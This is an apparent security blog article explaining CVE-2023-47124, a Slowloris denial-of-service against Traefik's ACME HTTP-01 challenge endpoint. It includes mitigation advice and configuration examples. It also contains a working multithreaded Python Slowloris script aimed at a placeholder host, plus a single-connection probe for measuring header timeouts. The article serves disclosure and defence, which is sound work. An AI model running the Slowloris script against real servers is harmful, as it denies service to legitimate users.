CVE-2023-47124 - How Attackers Exploited Traefik’s HTTPChallenge With a Slowloris Attack

Traefik is a popular open-source HTTP reverse proxy and load balancer widely used for routing and securing traffic to microservices and web applications. However, in late 2023 a vulnerability (CVE-2023-47124) was disclosed in Traefik’s handling of the ACME HTTP-01 challenge used with Let’s Encrypt. In simple terms, an attacker could abuse the challenge endpoint to mount a _Slowloris_ attack and deny service to the applications behind Traefik.

This article breaks down how the vulnerability worked, who it affects, and how you can protect your services—even if you can’t upgrade right away.

What is CVE-2023-47124?

CVE-2023-47124 is a vulnerability in Traefik before versions 2.10.6 and 3.0.0-beta5 that applies when Traefik is configured to obtain certificates with the ACME HTTPChallenge (the HTTP-01 challenge type). The bug lies in the way Traefik allows a client up to 50 seconds to complete a request to the HTTP-01 challenge endpoint, with nothing to reject clients that deliberately never finish.

Problem: An attacker can open hundreds or thousands of HTTP connections to the challenge endpoint and feed each one a few bytes at a time (a Slowloris attack). Every half-finished request is held for the full window, and each held connection ties up a file descriptor, a goroutine and some memory on the Traefik host, so legitimate users can be refused or delayed for as long as the attacker keeps its connections pending.

Official Advisory:
- GitHub Security Advisory GHSA-xghj-w2x5-7q3v
- NVD Details for CVE-2023-47124

Traefik serves HTTP-01 challenge for Let’s Encrypt

- When a certificate needs to be issued or renewed, Traefik temporarily serves the key authorization for the challenge at http://yourdomain/.well-known/acme-challenge/<token>, which the CA fetches to verify that you control the host.

Attacker opens many slow HTTP connections

- Attackers connect to the challenge URL and send the request headers _very slowly_ (“drip feeding” a few bytes at a time), never sending the blank line that terminates the header block.

Traefik keeps sockets open

- Traefik keeps each incomplete request open for the full 50-second window. With enough of them in flight, the host’s connection capacity (file descriptors, goroutines, memory) is exhausted.

Denial of Service

- Legitimate clients can’t connect or their connections are delayed—essentially a “Low and Slow” DoS attack.

Code Snippet: Example Slowloris Attack Script

Here’s a simple Python script illustrating how an attacker could perform a Slowloris attack against a Traefik instance that serves the HTTP-01 challenge. It starts a request for the challenge path, drip-feeds bogus headers, and never sends the blank line that would let the server finish reading the request:

import socket
import threading
import time

HOST = 'your-traefik-server.com'
PORT = 80

def slowloris_attack():
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((HOST, PORT))
    # Request line and Host header only: the terminating blank line
    # ("\r\n\r\n") is never sent, so the server keeps waiting for more headers
    request = f"GET /.well-known/acme-challenge/slowloris HTTP/1.1\r\nHost: {HOST}\r\n"
    sock.sendall(request.encode())
    # Slowly send more (meaningless) headers, one line every 5 seconds,
    # so the connection never looks idle
    for i in range(10):
        sock.sendall(b"X-a: b\r\n")
        time.sleep(5)
    # Keep the connection open without sending the final CRLF
    time.sleep(60)
    sock.close()

# Launch 100 concurrent slow connections (for demonstration purposes);
# each thread holds one connection open for roughly 110 seconds
for _ in range(100):
    threading.Thread(target=slowloris_attack).start()

Note: Don’t attack real servers. This is for educational purposes only.
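If you operate an edge and want to know whether it holds header-incomplete requests open (the behaviour the attack relies on), a single probe connection is enough. The following script is added here as an example and is not part of the original article or of the Traefik project. `slow_header_hold_time` opens one connection, sends a request without the terminating blank line, and reports how many seconds pass until the server closes it (or `max_wait` if it never does). The stub server, the `127.0.0.1` address, the `/.well-known/acme-challenge/probe` path and the 408 response are constructed for the example; a 1-second header timeout stands in for a server that bounds the wait, and no timeout stands in for the unbounded hold. Per the advisory, a vulnerable Traefik serving HTTPChallenge would hold the probe for about 50 seconds.

```python
import socket
import threading
import time


def slow_header_hold_time(host, port, max_wait=60.0,
                          path="/.well-known/acme-challenge/probe"):
    """Send an HTTP request that never completes its header block and return
    the seconds until the server closes the connection. Returns max_wait if
    the server is still holding the connection when we give up."""
    sock = socket.create_connection((host, port), timeout=max_wait)
    start = time.monotonic()
    try:
        # Request line plus Host header, but no terminating "\r\n\r\n"
        sock.sendall(f"GET {path} HTTP/1.1\r\nHost: {host}\r\n".encode())
        while True:
            data = sock.recv(4096)   # blocks for up to max_wait seconds
            if not data:             # EOF: the server closed the connection
                break
    except (socket.timeout, TimeoutError):
        return max_wait              # still open after max_wait seconds
    except ConnectionResetError:
        pass                         # abrupt drop by the server counts as a close
    finally:
        sock.close()
    return time.monotonic() - start


def start_stub_server(header_timeout):
    """Constructed stand-in for an HTTP front end on 127.0.0.1 (not Traefik).
    It waits header_timeout seconds for a complete header block (None = wait
    forever, mimicking the unbounded hold), and on timeout answers 408 and
    closes. Returns the ephemeral port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve_one():
        conn, _ = srv.accept()
        conn.settimeout(header_timeout)
        buf = b""
        try:
            while b"\r\n\r\n" not in buf:
                chunk = conn.recv(4096)
                if not chunk:        # client gave up first
                    break
                buf += chunk
            else:                    # header block completed normally
                conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")
        except (socket.timeout, TimeoutError):
            conn.sendall(b"HTTP/1.1 408 Request Timeout\r\n"
                         b"Connection: close\r\nContent-Length: 0\r\n\r\n")
        finally:
            conn.close()
            srv.close()

    threading.Thread(target=serve_one, daemon=True).start()
    return port


def measure(header_timeout, max_wait):
    """Run the probe against a stub server with the given header timeout."""
    port = start_stub_server(header_timeout)
    return slow_header_hold_time("127.0.0.1", port, max_wait=max_wait)


if __name__ == "__main__":
    print("bounded server (1s header timeout): held for",
          round(measure(1.0, 5.0), 2), "s")
    print("unbounded server, probe gives up after 2s: held for",
          measure(None, 2.0), "s")
```

Against a real host, call `slow_header_hold_time("your-traefik-server.com", 80)` once from a machine you are allowed to test from; a result that matches `max_wait` means the server never closed the half-sent request within your limit, while a result of a few seconds means a header timeout is in place. One connection is a measurement, not an attack, but get authorization before pointing it at anything you do not own.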

Upgrade Immediately:

- Upgrade to Traefik 2.10.6 or later, or 3.0.0-beta5 or later, where the issue is fixed.

Switch to a Different ACME Challenge Type:

- If you can’t upgrade, switch from HTTPChallenge to TLSChallenge (TLS-ALPN-01) or DNSChallenge (DNS-01). Neither serves a plain-HTTP challenge endpoint, so the slow-header hold described above does not apply. This is the workaround named in the advisory.

Use Reverse Proxy Protections:

- If possible, put Traefik behind nginx or HAProxy with short header/body timeouts and per-IP connection limits, so that incomplete requests are dropped at the front proxy before they ever reach Traefik’s challenge endpoint.
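As an added example (not configuration from the original article or the Traefik project), here is the affected static configuration beside the workaround. The resolver name `letsencrypt`, the e-mail address, the storage path and the `cloudflare` DNS provider are placeholders; adjust them to your deployment.

```yaml
# traefik.yml (Traefik v2 static configuration)
# BEFORE: HTTP-01 served from the plain-HTTP entrypoint on port 80.
# Affected on Traefik < 2.10.6 and < 3.0.0-beta5 (CVE-2023-47124).
entryPoints:
  web:
    address: ":80"
  websecure:
    address: ":443"

certificatesResolvers:
  letsencrypt:            # placeholder resolver name
    acme:
      email: admin@example.com   # placeholder
      storage: /data/acme.json   # placeholder
      httpChallenge:
        entryPoint: web

---
# AFTER: TLS-ALPN-01 on the TLS entrypoint; no challenge handler on port 80.
entryPoints:
  web:
    address: ":80"
  websecure:
    address: ":443"

certificatesResolvers:
  letsencrypt:
    acme:
      email: admin@example.com
      storage: /data/acme.json
      tlsChallenge: {}
      # Alternative (needed for wildcard certificates or hosts the CA cannot
      # reach on 443): DNS-01, with credentials supplied through the
      # provider's environment variables, not in this file.
      # dnsChallenge:
      #   provider: cloudflare
```

Routers that reference the resolver (`tls.certResolver: letsencrypt`) need no change when you swap the challenge type. If you also front Traefik with nginx, `client_header_timeout` and `client_body_timeout` set to a few seconds, plus a `limit_conn` zone keyed on the client address, are the directives that cut off slow-header connections before they reach the backend.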

Summary Table

| Version | Vulnerable? | HTTPChallenge | TLSChallenge | DNSChallenge |
|--------------------------|-------------|---------------|--------------|--------------|
| 2.10.5 and earlier | Yes | Affected | Not affected | Not affected |
| 2.10.6 and later | No | Not affected | Not affected | Not affected |
| 3.0.0-beta4 and earlier | Yes | Affected | Not affected | Not affected |
| 3.0.0-beta5 and later | No | Not affected | Not affected | Not affected |

References

- Traefik Security Advisory: GHSA-xghj-w2x5-7q3v
- Let’s Encrypt Challenge Types
- CVE-2023-47124 NVD Entry
- Slowloris attack explained (OWASP)

Key Takeaways

- Traefik’s handling of the HTTPChallenge in older versions let attackers tie up server resources with Slowloris connections to the challenge endpoint.

- If you use HTTPChallenge with Traefik, update as soon as possible or switch to TLSChallenge or DNSChallenge.

- Always review the security posture of your reverse proxies and how they handle long-lived or slow client connections.

Stay safe! If you have any questions, check the linked advisories and talk to your security team.

Timeline

Published on: 12/04/2023 21:15:33 UTC
Last modified on: 12/07/2023 21:01:24 UTC